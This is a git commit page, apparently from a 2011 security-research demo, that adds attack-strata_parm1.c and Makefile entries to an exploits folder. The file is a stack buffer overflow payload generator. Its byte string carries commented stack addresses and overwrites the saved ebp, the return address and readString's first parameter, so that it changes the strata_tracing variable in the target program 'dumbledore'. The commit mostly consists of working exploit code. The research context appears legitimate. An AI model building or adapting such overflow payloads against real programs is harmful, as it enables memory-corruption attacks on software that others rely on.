Adding attack-strata_parm1.c. An attack on strata's strata_tracing variable by

overwriting dumbledore.c's readString's first parameter and performing overwrite from there.

Adding attack-strata_parm1.c. An attack on strata's strata_tracing variable by
53003092 · mc2zk · 8d6eea65 · 53003092 · 53003092 · 53003092
Commit 53003092 authored 14 years ago by mc2zk
--- a/.gitattributes
+++ b/.gitattributes
@@ -7,6 +7,7 @@ demos/demo.jan_21_2011/dumbledore.c -text
 demos/demo.jan_21_2011/dumbledore.exploits/Makefile -text
 demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeA.no_strata.c -text
 demos/demo.jan_21_2011/dumbledore.exploits/attack-gradeB.no_strata.c -text
+demos/demo.jan_21_2011/dumbledore.exploits/attack-strata_parm1.c -text
 demos/demo.jan_21_2011/dumbledore.exploits/attack-strata_tracing.c -text
 demos/demo.jan_21_2011/dumbledore.exploits/badA.txt -text
 demos/demo.jan_21_2011/dumbledore.exploits/badB.txt -text

--- a/demos/demo.jan_21_2011/dumbledore.exploits/Makefile
+++ b/demos/demo.jan_21_2011/dumbledore.exploits/Makefile
@@ -11,14 +11,20 @@ all: attack-gradeA attack-gradeB attack-strata_tracing
 attack-strata_tracing: attack-strata_tracing.o
 	${PS_TOOLBASE}/ps_link.sh attack-strata_tracing.o -o attack-strata_tracing

+attack-strata_parm1: attack-strata_parm1.o
+	${PS_TOOLBASE}/ps_link.sh attack-strata_parm1.o -o attack-strata_parm1
+
 attack-gradeA.no_strata: attack-gradeA.no_strata.o
 	${PS_TOOLBASE}/ps_link.sh attack-gradeA.no_strata.o -o gradeA.no_strata

 attack-gradeB.no_strata: attack-gradeB.no_strata.o
 	${PS_TOOLBASE}/ps_link.sh attack-gradeB.no_strata.o -o gradeB.no_strata

+attack-graCE_infinite: attack-graCE_infinite.o
+	${PS_TOOLBASE}/ps_link.sh attack-graCE_infinite.o -o graCE_infinite
+
 .c.o:
 	${PS_TOOLBASE}/ps_comp.sh $<

 clean:
-	rm gradeA.no_strata gradeB.no_strata attack-strata_tracing *.o
+	rm gradeA.no_strata gradeB.no_strata attack-strata_tracing attack-graCE_infinite attack-strata_parm1 *.o
--- a/demos/demo.jan_21_2011/dumbledore.exploits/attack-strata_parm1.c
+++ b/demos/demo.jan_21_2011/dumbledore.exploits/attack-strata_parm1.c
+/* This attack generator attempts to overwrite the first parameter to 
+ * readString with the address of one strata variable, strata_tracing 
+ *  Then when the copying of the buffer to the parameter is carried out,
+ *  the value of strata_tracing can be changed to 1.
+ *
+ * strata_tracing is laid out next to the TI struct. 
+ * For the program not to crash, 
+ * the attack must preserve all the bytes of TI that might be overwritten.
+ * This means that the first 98 bytes (BUFSIZE) of the attackString should
+ * match the memory starting from strata_tracing, with the exception of the
+ * changed value of strata_tracing that is desired.
+
+ */
+
+#include <stdio.h>
+#include <string.h>
+                                      /* stack location address */
+char attackString[] = "\x01\x00"                   /* 0x0bfffefa6 */
+                      "\x00\x00\x00\x00"                 /* 0x0bfffefa8 */
+                      "\x00\x00\x00\x00"                 /* 0x0bfffefac */
+                      "\x00\x00\x00\x00"              /* 0x0bfffefb0 */
+                      "\x00\x00\x00\x00"     /* 0x0bfffefb4 */ 
+		      "\x00\x00\x00\x00"     /* 0x0bfffefb8 */
+                      "\x00\x00\x00\x00"     /* 0x0bfffefbc */
+                      "\x00\x00\x00\x00"     /* 0x0bfffefc0 */
+                      "\x00\x00\xd2\x27"     /* 0x0bfffefc4 */
+                      "\x25\x09\x55\x12"     /* 0x0bfffefc8 */
+                      "\x0d\x09\xfc\x27"     /* 0x0bfffefcc */
+                      "\x25\x09\xb9\x67"     /* 0x0bfffefd0 */
+                      "\x25\x09\x2e\x49"     /* 0x0bfffefd4 */
+                      "\x25\x09\x7c\x51"     /* 0x0bfffefd8 */
+                      "\x25\x09\x6e\x53"     /* 0x0bfffefdc */
+                      "\x25\x09\x84\x5a"     /* 0x0bfffefe0 */
+                      "\x25\x09\x10\xf6"     /* 0x0bfffefe4 */
+                      "\x25\x09\xd9\x2c"     /* 0x0bfffefe8 */
+                      "\x25\x09\xe3\x67"     /* 0x0bfffefec */
+                      "\x25\x09\xf0\xd1"     /* 0x0bfffeff0 */
+                      "\x25\x09\x30\x9d"     /* 0x0bfffeff4 */
+                      "\x25\x09\xb4\x67"     /* 0x0bfffeff8 */
+                      "\x25\x09\xff\x95"     /* 0x0bfffeffc */
+                      "\x25\x09\x98\x18"     /* 0x0bffff000 */
+                      "\x25\x09\x8e\x67"     /* 0x0bffff004 */
+                      "\x62\x00\x00\x00"     /* 0x0bffff008 */  /* i here */
+                      "\x20\x20\x20\x20"     /* 0x0bffff00c */  /* c here */
+                      "\x20\x20\x20\x20"     /* 0x0bffff010 */
+                      "\x20\x20\x20\x20"     /* 0x0bffff014 */
+                      "\x38\xf0\xff\xbf"     /* 0x0bffff018 */  /* ebp */
+                      "\xfd\x82\x04\x08"     /* 0x0bffff01c */ /*  return addr */
+                      "\x00\xe2\x33\x09"     /* 0x0bffff020 */ 
+				/* addr of parm 1, changed to addr of strata_tracing */ 
+                      "\x0a\x0a\x0a\x0a"     /* 0x0bffff024 */
+                      "\x0a\x0a\x0a\x0a";    /* 0x0bffff028 */
+int main() {
+   int i;
+   char *p = attackString;
+   for (i = 0; i < sizeof(attackString); i++) {
+      putchar(*p);
+      p++;
+   }
+   return 1;
+}
+